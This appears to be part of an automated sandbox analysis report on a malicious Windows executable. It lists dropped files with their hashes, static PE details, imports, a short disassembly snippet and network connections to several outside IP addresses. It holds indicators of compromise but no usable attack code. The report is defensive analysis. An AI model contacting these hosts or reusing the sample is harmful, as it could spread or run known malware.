Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE5F1.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\4851.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE621.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\4851.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE622.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\4851.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001S (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11000893562382316
Encrypted:	false
SSDEEP:	12:265AXm/Ey6q99952ziMmq3qQ10nMCldimE8eawHjc2:265xl68UzTDLyMCldzE9BHjc2
MD5:	60A3B2C1804DBD8AED911BA9B5B79CD2
SHA1:	A6331F04DD6EF587CABB9B08069DE61CE27EBDFA
SHA-256:	BA6131137235CA5B30EA430C8863FA5A53FD3AC0DE98AB818EABDC30AFDC0CF7
SHA-512:	84F11B73878DE2BA5497C451CE7F4E12E7582A5833864B855A2B75C797840A6790C7314EA2FD2ADF2E33FB68F9C09FF55AB6DF81EAC04A198B63F5C45B9198EF
Malicious:	false
Reputation:	unknown
Preview:	..........................................................................................f......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................m_../..... .....+..Q............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P..........'f.....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11277864231701182
Encrypted:	false
SSDEEP:	12:hXm/Ey6q99952zib1miM3qQ10nMCldimE8eawHza1miI2:Ml68UzS1tMLyMCldzE9BHza1tI2
MD5:	AC01D3484F8956102EB5C271CAF98F32
SHA1:	08D397B63462CA210F16DB21AA704E67B9DF0E0C
SHA-256:	BF6300A570462BF118A99EE203070BF945D19EEB9B1033890BF0A51D6433761F
SHA-512:	77E6837A8024FD94EAC0DA4C3C6B74A6205B3AE78FCC390FF53603853AA63F323D2CC877190A5040DC19D77F8C8CA9F929F2B7CC70F8CFDECE209DBFC5EA97F3
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................6.d......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................m_../..... .....B..Q............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........d.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1126481908295576
Encrypted:	false
SSDEEP:	12:NXm/Ey6q99952zif1mK2P3qQ10nMCldimE8eawHza1mKH:wl68Uzy1iPLyMCldzE9BHza17
MD5:	131924CC1F70F01D1D1D61D1D31C13EB
SHA1:	A8ECD23D14CA8B717D06E658C6A7D35B293773A6
SHA-256:	A179E9B625DEA158B5358964DBD43D929A9990D21A8E017AF2F5BCE153039DC4
SHA-512:	CFD26ABA243AED677E0652F6CB9A3DEA5F78993E18042B43BA400CF8548D3CA65911A81631E1326B2957B8F9E3B53C4D1F7D3092079A67289A6FD3A18D55EF76
Malicious:	false
Reputation:	unknown
Preview:	..........................................................................................b......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................m_../..... .....ZW.Q............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........g.b.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uwtjrji Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.901309457671725
Encrypted:	false
SSDEEP:	6144:Ifs8yKSn4A/vLPxXdB982jKD0zldXDNXH:shSXHLPxD982Og5dTF
MD5:	5C65AF376BFF0067A2109686755B36DB
SHA1:	97FE279E6107F0B1B8A6B34073F21B85B71E9A38
SHA-256:	9ECBF71BF0F2833437B61948EB635A404D5D835FADC13669CCC433BC6E9954C1
SHA-512:	97D71490C89C1218FEDE0AB9F8B3BC859649C676348E992FAEE297FA7F7F4693D5D260A879111243F9B3E2C51B27F2C40B6B531D991DE41055EBAA0CF7098A1C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 41%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.Ib..'1..'1..'1...1..'1...1j.'1...11.'1 .\1..'1..&1..'1...1..'1...1..'1...1..'1Rich..'1........PE..L......^.....................t......."............@..........................P.......,...................................... o..<.......`5..........................`................................e..@............................................text...0........................... ..`.rdata..............................@..@.data...@............n..............@....rsrc...`5.......6...z..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uwtjrji:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.147121814584381
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3r8b0jk9+MlWlLehB4yAq7ejC1b0u:OaqdmuF3rE+kWReH4yJ7MC
MD5:	1FA0985DB5360C961B8D80D5D4FB4BBC
SHA1:	8F47BF1ECF4051335460A0768B31E2A0B725D45C
SHA-256:	031D1028EEA83DCDAC4496F1DDE90E05B3A1AF1AB25C3CB411501FE6D8C0B2CB
SHA-512:	A81F4694F1983BD3D89A4FEE887BB10251ABF6234ED9492A68F1594DB84DE9EBDB925A6DA386B46E4BCE359234C342521657052954A8B242B1CBDCE635ABEDD4
Malicious:	false
Reputation:	unknown
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. A.u.g. .. 2.3. .. 2.0.2.1. .0.2.:.0.8.:.4.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. M.o.n. .. A.u.g. .. 2.3. .. 2.0.2.1. .0.2.:.0.8.:.4.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.901309457671725
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xuTyOmef1g.exe
File size:	241664
MD5:	5c65af376bff0067a2109686755b36db
SHA1:	97fe279e6107f0b1b8a6b34073f21b85b71e9a38
SHA256:	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1
SHA512:	97d71490c89c1218fede0ab9f8b3bc859649c676348e992faee297fa7f7f4693d5d260a879111243f9b3e2c51b27f2c40b6b531d991de41055ebaa0cf7098a1c
SSDEEP:	6144:Ifs8yKSn4A/vLPxXdB982jKD0zldXDNXH:shSXHLPxD982Og5dTF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.Ib..'1..'1..'1...1..'1...1j.'1...11.'1 .\1..'1..&1..'1...1..'1...1..'1...1..'1Rich..'1........PE..L......^...................

File Icon


Icon Hash:	aedaae9ee6a68aa4

Static PE Info

General
Entrypoint:	0x4022e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5EA9BA95 [Wed Apr 29 17:34:13 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0651d9dcd3efcdffaff927d730c581e7

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FCC20888B9Bh
call 00007FCC2087E6E6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 004267F8h
push 004081F0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [004287E4h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041F080h]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FCC2087E6F8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FCC2087E827h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FCC2087E864h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FCC20889A2Ah
add esp, 04h
test eax, eax
jne 00007FCC2087E6DCh
push 0000001Ch
call 00007FCC2087E81Ch
add esp, 04h
call 00007FCC20882994h
test eax, eax
jne 00007FCC2087E6DCh
push 00000010h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26f20	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1fa1000	0x3560	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1f260	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x265c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x210	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1dc30	0x1de00	False	0.461468684623	data	6.28019524937	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x8b1a	0x8c00	False	0.306361607143	data	4.72615600002	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x28000	0x1f78740	0x10c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1fa1000	0x3560	0x3600	False	0.693214699074	data	6.0681552148	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1fa1210	0x25a8	dBase III DBT, version number 0, next free block index 40	French	Luxembourg
RT_STRING	0x1fa3a08	0x434	data
RT_STRING	0x1fa3e40	0x384	data
RT_STRING	0x1fa41c8	0x392	data
RT_ACCELERATOR	0x1fa3850	0x98	data
RT_ACCELERATOR	0x1fa37d0	0x80	data
RT_GROUP_ICON	0x1fa37b8	0x14	data	French	Luxembourg
RT_VERSION	0x1fa38e8	0x120	data

Imports

DLL

Import

KERNEL32.dll

UnregisterWait, SetThreadContext, SetFilePointer, lstrlenA, CopyFileExW, InterlockedIncrement, GetQueuedCompletionStatus, GetCommState, InterlockedDecrement, CompareFileTime, GetNamedPipeHandleStateA, GlobalLock, WaitForSingleObject, SetEvent, OpenSemaphoreA, FreeEnvironmentStringsA, GetTickCount, CreateNamedPipeW, VirtualFree, GetConsoleAliasesLengthA, GetCommandLineA, GetDriveTypeA, TlsSetValue, GetPriorityClass, GetConsoleMode, TerminateThread, GetSystemWindowsDirectoryA, SetConsoleMode, IsProcessorFeaturePresent, ReadFile, GetOverlappedResult, CompareStringW, GetStartupInfoW, GetPrivateProfileIntW, CreateDirectoryA, ReleaseActCtx, GetFileSizeEx, SetCurrentDirectoryA, SetThreadLocale, OpenMutexW, GetLastError, IsDBCSLeadByteEx, ReadConsoleOutputCharacterA, GetProcAddress, CopyFileA, GetPrivateProfileStringA, LoadLibraryA, LocalAlloc, IsSystemResumeAutomatic, WriteProfileSectionW, HeapWalk, SetNamedPipeHandleState, SetConsoleTitleW, FindFirstChangeNotificationA, EnumResourceNamesA, WriteProfileStringW, GetConsoleCursorInfo, FatalAppExitA, GetCurrentThreadId, GetCPInfoExA, GetVersionExA, FindAtomW, FindActCtxSectionStringW, UnregisterWaitEx, GetSystemTime, LCMapStringW, DeleteFileA, WideCharToMultiByte, HeapValidate, IsBadReadPtr, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsFree, SetLastError, Sleep, ExitProcess, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, HeapFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, RtlUnwind, MultiByteToWideChar, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, GetConsoleCP, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, FlushFileBuffers, CreateFileA, CloseHandle

WINHTTP.dll

WinHttpCloseHandle

Version Infos

Description	Data
Translation	0x120a 0x0524

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	Luxembourg

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2021 02:07:54.817961931 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:55.076159954 CEST	80	49708	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:55.076320887 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:55.076476097 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:55.076504946 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:55.334605932 CEST	80	49708	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:56.020724058 CEST	80	49708	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:56.020766020 CEST	80	49708	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:56.020848036 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.020874977 CEST	49708	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.072247982 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.282833099 CEST	80	49708	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:56.356676102 CEST	80	49709	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:56.356873035 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.357016087 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.357050896 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:56.637063026 CEST	80	49709	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:57.339543104 CEST	80	49709	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:57.339581013 CEST	80	49709	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:57.339809895 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.339837074 CEST	49709	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.401949883 CEST	49710	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.619189978 CEST	80	49709	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:57.663009882 CEST	80	49710	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:57.666419983 CEST	49710	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.666501045 CEST	49710	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.668013096 CEST	49710	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:57.928529024 CEST	80	49710	218.233.73.202	192.168.2.3
Aug 23, 2021 02:07:58.486998081 CEST	49710	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:07:58.820626020 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:07:59.091480970 CEST	80	49711	222.236.49.124	192.168.2.3
Aug 23, 2021 02:07:59.091603994 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:07:59.091788054 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:07:59.091799021 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:07:59.362592936 CEST	80	49711	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:00.299171925 CEST	80	49711	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:00.299242973 CEST	80	49711	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:00.299381971 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:00.704216003 CEST	49711	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:00.836157084 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:00.975090027 CEST	80	49711	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:01.105465889 CEST	80	49713	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:01.105595112 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:01.105724096 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:01.105747938 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:01.374887943 CEST	80	49713	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:02.273335934 CEST	80	49713	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:02.273426056 CEST	80	49713	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:02.273549080 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:02.425904989 CEST	49713	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:02.460021019 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.490972042 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.491102934 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.491183996 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.522464991 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523536921 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523566961 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523587942 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523611069 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523636103 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523654938 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.523658991 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523682117 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523714066 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523736954 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523746967 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.523761034 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.523762941 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.523811102 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.554697037 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554766893 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554806948 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554830074 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554882050 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554898977 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554930925 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554948092 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554960966 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554982901 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.554995060 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555006027 CEST	80	49715	193.142.59.123	192.168.2.3
